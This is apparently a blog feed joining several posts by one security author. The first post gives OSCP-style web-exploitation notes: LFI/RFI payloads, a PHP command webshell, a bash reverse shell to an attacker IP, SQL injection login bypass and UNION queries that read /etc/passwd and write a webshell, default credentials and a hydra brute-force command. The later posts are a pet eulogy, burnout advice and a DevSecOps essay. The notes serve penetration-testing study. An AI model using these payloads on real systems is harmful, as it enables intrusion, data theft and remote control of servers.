This content was written by a human being; If you find it useful, enjoyable, or influential (and have the coin to spare) - you can support my work via Patreon.️ Thank you to those who already support this blog! 😊 And now, back to that organic content you were enjoying! 🎉
PHP applications, at least in the context of the OSCP labs, are notorious for having local and/or remote file inclusion vulnerabilities Local file inclusion (LFI) is commonly exploited using directory traversal techniques.
Browse to your target destination (Linux example)
http://<ip-addr>/LFI.php?file=../../../../../../var/log/apache2/access.log&cmd=ls
Using the RFC for PHP, you can find wrappers that let you perform commands (such as data
) as follows:
LFI.php?file=data:text/plain,<base64 encoded string>
LFI.php?file=data:text/plain,d2hvYW1p
Generating a base64 string and place it after the plain,
echo -n 'command' | base64
Using curl command, you can upload files
curl -X PUT -T "$pwd/filename.ext" "http:/$IP:$PORT/dir/filename.ext
Switching to testing for RFI, create a File Inclusion test by writing a local file (like a .php
) *
1
2
3
4
<?php
phpinfo();
?>
Note: If you write a
.txt
file the web server might still execute the file’s contents.
Test for a Remote File Inclusion
RFI.php?file=http://<tun0-ip-address:<port>/phpinfoscript.php
First search for PHP functions on the web server that are disabled
disable_functions
will tell you what is disabled on the remote server.
Add exploitation code to your script:
1
2
3
4
<?php
echo exec($_GET['cmd']);
?>
Attempt to exploit Remote File Inclusion
RFI.php?file=http://<tun0-ip-address>:<port>/file.php&cmd=<bash commands>
Get a Reverse Shell
1
2
3
4
<?php
echo exec("bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1'");
?>
Usually my automated enumeration will start finding interesting endpoints for further exploitation, such as the common endpoints wp-admin
, wp-content
, and wp-includes
. You can also use wpscan to enumerate things further:
Scanning for all plugins, themes, config backups, and database exports:
wpscan --url http://site-ip/domain --enumerate ap,at,cb,dbe
From here I usually turn to searchsploit
to find exploits against the results uncovered with the above scan. Do you research (Google search) about the exploit and how to use it, and proceed from there.
Editing theme for Reverse Shell
First, some important links to useful documentation in the exploit process:
My absolute favorite technique for bypassing logins via the password
field:
' OR '1'='1
Note that this always resolves as
true
, and successfully terminates the query without manipulating the rest of the SQL string.
The '
character can terminate a SQL string and then be exploited
End a query with the #
character
Look for things like Password Reset tokens
You’ll need to find the exact same number of columns via ORDER BY
techniques
SELECT <column>, <column>, FROM <table>, ORDER BY <number> #
Note:
ORDER BY
will throw an error when you go beyond the number of columns
Enumerating Tables and Columns with INFORMATION_SCHEMA
' UNION SELECT TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.columns #
Selecting the Schema to search
' UNION SELECT TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.columns WHERE TABLE_SCHEMA != "<removed_schema>"#
Note: you can remove things like “mysql”
In MySQL there is a privilege called priv_file
' UNION SELECT file_priv,<c2>,<c3> FROM mysql.user where user="<user>"
Note:
<c#>
represents the column
Need to check for secure_file_priv
to determine exploitability
' UNION SELECT @secure_file_priv,<c2>,<c3> #
Note: If the variable is empty when it returns, it is insecure
Try to Read a file
' UNION SELECT load_file("/etc/passwd"),2,3 #
Try to Write to a file
' UNION SELECT 1,2,3 into outfile “/tmp/test.txt” #
Write a Shell to a File (need LFI / external file access to use)
1
' UNION SELECT <? php system(GET[\\"cmd\\"]); ?>",2,3 into outfile "/writeable/directory/remotely.php" #
Does the website have a login using default credentials?
PHPMyAdmin →
root/<blank>
Tomcat →
tomcat/tomcat
admin/admin
admin/password
Can I brute force the login page with hydra?
1
2
3
hydra -l username -P wordlist.txt $IP http-post-form \
"/path/to/page.html:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed! Your user name or password was
entered incorrectly."```
Target a list of usernames with
-L
flag
Target a list of passwords with
-P
flag
Target other services by using
ftp://IP-addr
orssh://IP-addr
Limit the number of threads with
-t #
Is the site running Apache/Tomcat?
And with that - as always, thanks again for stopping by to read my pseudo-random musing 😊 While I draft my next blog post, you can git checkout
other (usually off-topic) content I’m reading over at Instapaper - or go back and read my original “Hacking the OSCP” blog post for life lessons that the OSCP can’t teach you.
Until next time, remember to git commit && stay classy
!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who support this content!
]]>We got Dalinar when he was just eight weeks old. He was named after Brandon Sanderson’s character from the Stormlight Archive shortly after my wife had started reading (and fell in love with) “The Way of Kings”. We mostly got him to be a companion to our then-six month old cat so that she wouldn’t be lonely - and after a few days of grumbling, they bonded better than we could have possibly hoped for 🥺
We also got Dalinar as a way for my wife and I to prepare ourselves for starting a family. After five years without success in that endeavor - in spite of all the benefits that science and modern medicine have to offer - losing him feels like being kicked while we’re already down. But that’s not how I want to remember him; he brought such tremendous joy and happiness to our lives ❤️
He was incredibly cuddly, playful, talkative, expressive, and curious to a fault. We had to get child safety latches for the cabinets because of him. He certainly earned the monicker “the Blackthorn” from his namesake for how furiously he played, and his meows could be heard from anywhere in the household - especially when he carried around his favorite toys in triumph.
And while we were close, he and my wife were even closer. Every night he would cuddle up with her in bed, pressing his wet nose into her cheeks and purring sweet nothings while he kneaded her for comfort. His love was always so endearing - which made it hard to be mad at him when he caused a ruckus at three in the morning because he wanted to cuddle.
Losing him is more painful than words can describe, and I know that healing is going to take a long time. His love for life - and those that were a part of his - was felt by family and friends alike. Today our home and our hearts are a little quieter, a lot emptier, and greatly saddened without him. My only hope is that, whatever spiritual existence might come next for him, it is enduring and filled with love, treats, and plenty of warm sunshine to bask in ☀️
He was our handsome boy; our Blackthorn; our High King. We love you buddy - you will be sorely missed 💔😭
]]>Suicide is practically taboo as a topic of discussion amongst information security professionals, which is unfortunate for how common it is in our community. If you find yourself in a recurring state of being stressed, angry, sad (or depressed), fatigued, unmotivated, or otherwise experiencing a consistent malaise - it’s time to take a break.
That said, recognizing these symptoms in ourselves isn’t always easy - especially over long periods of time. Some tricks to help externalize these feelings might include something like a daily “color chart” for mood (usually captured in a grid notebook), journaling our daily experiences, or creating a system of “scoring” our day across a handful of measurements like “energy”, “happiness”, “productivity”, “motivation”, and/or “fulfillment”.
What’s important here is coming up with a system to capture measurements such that you can zoom out and recognize overarching trends. If you also have a means to capture a few quick notes as part of this system then all the better. Personally, I don’t have a specific recommendation on what application(s) or method(s) work best; the method I rely on is the HeadSpace monthly check-in. I may look into Notion templates, but for now the monthly measurement feels like enough.
One of the hardest things about taking a break is the feeling of guilt many of us experience when we allow ourselves time to slow down. For me it’s akin to a feeling of failure; that I’ve somehow disappointed myself by not continuing to grind it out. This feeling itself is also a warning sign that we may be heading down a path toward burnout; it’s important to start by acknowledging that we are deserving of the time we take to rest and recharge. The Atlantic has a whole series on the health benefits of “Doing Nothing” that is well-worth reading if you subscribe to their content.
That said, the TL;DR of that series is that the first step in taking breaks is to allow yourself time to be unproductive. If your battery is already running low, you won’t really be allowing yourself time to recharge by draining that battery further with non-work activities that you’re being productive with. Honestly, this is why I strongly encourage two-week vacations for anyone that has the privilege to take them. That first week is all about unwinding the built-up stress from work, and that second week is for recharging.
Likewise, finding creative outlets that you pour yourself into can often be a great way to recharge after you’ve gone through the process of resting and recovering. Although I should also offer a word of caution - try to avoid creative outlets too closely aligned with your day-to-day work. While these might feel fun and enjoyable in the moment, they often trigger the same stress response that led to your reason for taking a break in the first place.
And if creative outlets aren’t your thing, there are other great ways to recharge - like reading a book, catching up on a tv series (strong recommendation for Sci-Fi fans - go watch The Expanse on Amazon), watching a movie, or even playing a video game. Although my recommendation on the video game front would be to find something that doesn’t involve Player vs. Player combat, as that can create its own stressful and frustrating experiences; go for something more along the lines of “Breath of the Wild” versus “Overwatch”.
This content was written by a human being; If you find it useful, enjoyable, or influential (and have the coin to spare) - you can support my work via Patreon.️ Thank you to those who already support this blog! 😊 And now, back to that organic content you were enjoying! 🎉
It’s easy to get trapped in a never-ending cycle of breaks. For many, there comes a point where a part of you starts to crave that sense of accomplishment and fulfillment that comes from putting in the work. You should listen to this feeling, as this is when you know it’s time to start wrapping up and preparing to get back to the grind. My advice is to transition back into productivity slowly, as leaping right back into things full-tilt will quickly undo all of that recovery you’ve just experienced.
Hopefully you will have identified activities and behaviors during your break that can help you de-stress and recover in smaller bursts once you return to a regular work schedule. The key here is striking a balance between taking longer breaks, and maintaining your health and well-being in between those breaks.
To maintain your well-being between longer breaks, my first piece of advice is to look for early warning signs and take breaks before you need them. Personally, I’m really terrible at this - I tend to let myself get to a state of being burnt out before I make it to my next break, which often creates a lot of stress leading up to my time off. Don’t be like me - keep a close eye on your mood and stress levels, and take breaks earlier than you think you’ll need them.
Likewise, if you find yourself going through repeat cycles of stress and recovery, look into seeing a therapist. And just so I’m clear - you don’t need to be depressed or experiencing relationship issues to justify seeing a therapist! In the same way you might see a fitness instructor or a career coach for those areas of your life, therapists help you solidify your emotional foundation so that you can find a sense of peace within. I was fortunate to see a therapist for several years when I was young, and it has made my life significantly better as a result of being comfortable with who I am.
And if for some reason therapy is inaccessible for you, there is also the practice of meditation. I would not say that meditation is a substitute for therapy, but the introspection that comes with practicing meditation can be a palliative experience. I have personally found zen meditation to be the most fulfilling practice, but there are a lot of meditation practices out there that can have a positive affect on your life.
As I mentioned previously, I use Headspace for my daily practice - but there are many apps available and many different forms of meditation. If you decide to take up this practice, spend some time finding the right experience for you before settling into a routine. You might even find that getting outside and away from technology can lend a spark to your creativity and energy levels. After all, there’s a reason why humans love the smell of nature after the rain.
Finally, try to find hobbies and experiences that bring you joy and fulfillment outside of the technology space. The act of creating things through various crafts and practices can bring about that sense of accomplishment and fulfillment which many lack in the day-to-day experiences on the job. Finding things that bring you small moments of happiness throughout the week are essential for recharging your energy levels and reducing stress between taking breaks.
And when all else fails, I try remember my favorite line from Van Wilder:
Don’t take life too seriously - you’ll never get out alive.
As always, thanks again for stopping by to read my pseudo-random musing 😊 While I draft my next blog post, you can git checkout
other (usually off-topic) content I’m reading over at Instapaper - or review my DevSecOps Essentials” series for a detailed walkthrough of how my team delivered security at scale for Thermo Fisher Scientific.
Until next time, remember to git commit && stay classy
!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who already support this content!
]]>The knowledge shared in this post is derived from my experience building the DevSecOps program at Thermo Fisher Scientific - a global Fortune 100 laboratory sciences company with over 130,000 employees and $39 Billion in annual revenue.
Full Disclosure up-front: I am employed as a Principal Security Specialist at GitHub at the time of publishing this blog post.
The unfortunate side effect of marketing buzzwords are that they often trick security practitioners into believing we can accomplish different outcomes by continuing to do the same things we’ve always done. This, my friends, is the definition of insanity - which is why it’s important we acknowledge that security teams can’t just do “DevSecOps” without first embracing “DevOps”. Security’s failure on this front is probably why so many companies continue using rebranded “sparkling AppSec” technologies that have failed developers for the last two decades.
And no - by embracing DevOps I don’t mean that security practitioners suddenly need to start writing Dockerfiles and Helm charts for artisinally crafted, home-grown, API-driven microservice security applications. What I’m referring to here are the words of Jez Humble (one of The DevOps Handbook authors), who once stated that DevOps is “just communication, coordination, and collaboration”.
If we are to succeed at securing companies and meeting the regulatory requirements we’re held to, security professionals must start by embracing DevOps through communicating, coordinating, and collaborating with our colleagues who write software.
Before security teams buy - or build- anything for our colleagues in development, we should be having regular conversations with the software engineers responsible for building the company’s most profitable technologies. Most security teams fail to deliver meaningful changes that provide impact at scale because we skip this step in the process. I mean seriously - if you want to know which security tools these teams will actually use, just ask them.
And before anyone makes a predictably snarky comment - you don’t have to give developers the option of “none” here. The right way to approach buying (or building) security technologies for our colleagues is to understand their work environment. What technologies do they interface with regularly? Do they enjoy that experience - or is there something out there they’d prefer to be using? Can we find a way to procure that technology and bundle security into it? We can only learn these things from ongoing discussions with software development teams.
I’m sure at least one person reading this is probably thinking: “but I can’t talk with all of my development teams. We have a thousand developers for every member of our security team”. And the truth is that you don’t need to scale that far; You only need to develop relationships with the 20% of development teams that represent 80% of the risk to the business. More on that later.
If you’ve ever talked with development teams, you’ll probably learn of at least one technology they absolutely hate working with. It could be anything from a workflow management system, the version control software, or a ticketing system required as part of the change review process. It might even be that security solution you’re making them use. Whatever the technology is - this is where you’ll find opportunities to make their job easier while implementing security technologies.
For development teams at Thermo Fisher Scientific, this was the version control system. Without going into too much detail here (as I’ve written an entire blog post on the subject), the development teams were tasked with maintaining their own archaic system; this required the attention of at-least three developers to keep running. When the security organization offered to buy a solution that we would manage, development teams rejoiced - and their leaders seized onto an opportunity to reallocate budgets (and development talent) toward other meaningful pursuits.
This was a win-win situation for the business, and we were able to roll it out quickly at scale due to mutual agreement on pursuing this change which helped both organizations be more productive. We were only able to accomplish this through building meaningful relationships with the development organization - and then coordinating on efforts to maximize positive outcomes for everyone involved.
As relationships between security and development teams grow, you start finding there’s a multitude of win-win opportunities waiting to be unleashed. This especially happens when teams share things like their Objectives and Key Results (OKR’s) - allowing teams to collaborate on delivery timelines that are mutually beneficial and reduce risk to the business.
In my experience, the mutual trust between teams turned into receiving feedback from developers about technical debts that posed a risk to the business. They wanted to address these debts, but couldn’t because project managers were not giving them the time needed to do this work. By helping these developers raise awareness of the issue, they agreed to also address security-related tasks as part of paying down the technical debt. Win-win.
Simply put, there needs to be a sense of shared goals and strong partnership between development and security teams to achieve such outcomes. That is only accomplished by building relationships through communication, and then strengthening those relationships through coordination and win-win opportunities. This eventually leads to ongoing collaboration that both reduces risk to the business - while also making development teams more efficient.
How to support this content: If you find this post useful, enjoyable, or influential (and have the coin to spare) - you can support the content I create via Patreon.️ Thank you to those who already support this blog! 😊 And now, back to that content you were enjoying! 🎉
In the words of former Target CIO Mike McNamara: “Build what will provide a competitive advantage, buy the rest”.
And let’s face it: unless you’re Microsoft, Apple, Google, or Amazon - you probably don’t have the finances necessary to build and scale teams that develop technologies to make your company competitive through security.
Moreover, the reason these companies can successfully build in-house technologies that allow them to compete on security is because they can scale teams to a point of resilience against attrition. They’re also attracting some of the world’s best talent who can build these technologies because they can afford it. Unless your company is willing to invest a substantial amount of money to compete through security, you’re almost always better off buying a technology and scaling it.
As I mentioned earlier - you don’t need to build relationships with the entire development organization to achieve success at scale. You only need to engage with the 20% of teams that represent 80% of the risk to the business. This is known as the Pareto Principle - and it shows up all over the place.
By now I’m sure someone is probably yelling “but my auditor(s) / regulator(s) / leadership demand that I protect 100% of the business!!!” - and you will. But first, by focusing on the 20% of the business that represents 80% of the risk, you generate the necessary outcomes which allow you to address the remaining business risks.
First, by showing you can successfully work with 20% of teams that generate 80% of the risks, you gain the trust of your leadership and development colleagues. This allows you to make further inroads into the business to uncover new risks. It also proves that you can deliver on your objectives and key results.
Secondly, the security program gains momentum as you prove to leadership that you can have an impact at scale. This earns your team a reputation for getting things done - which usually leads to further investments and more opportunities to make an impact. It’s very difficult for others to slowdown progress when you move quickly.
And finally - you gain instant credibility when you meet new leaders and teams. Through leveraging the relationships you’ve built with 20% of the development organization, you open doors to otherwise reluctant leaders and developers; Share what you’ve accomplished with these other teams. This information presents both a “what’s your excuse?” challenge, and unlocks a natural inclination toward competition between business groups.
Eventually you’ll find yourself deeply embedded in the business. Through communication, coordination, and collaboration you will have built a security program that meets developers where they are - all while helping the business make progress toward reducing risk and transforming how they work in ways that are more efficient and productive. This is what it means to do “DevSecOps”.
We can’t win together if we don’t work together.
As always, thanks again for stopping by to read my pseudo-random musing 😊 While I draft my next blog post, you can git checkout
other (usually off-topic) content I’m reading over at Instapaper - or review my DevSecOps Essentials series for a detailed walkthrough of how my team delivered security at scale for Thermo Fisher Scientific.
Until next time, remember to git commit && stay classy
!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who already support this content!
]]>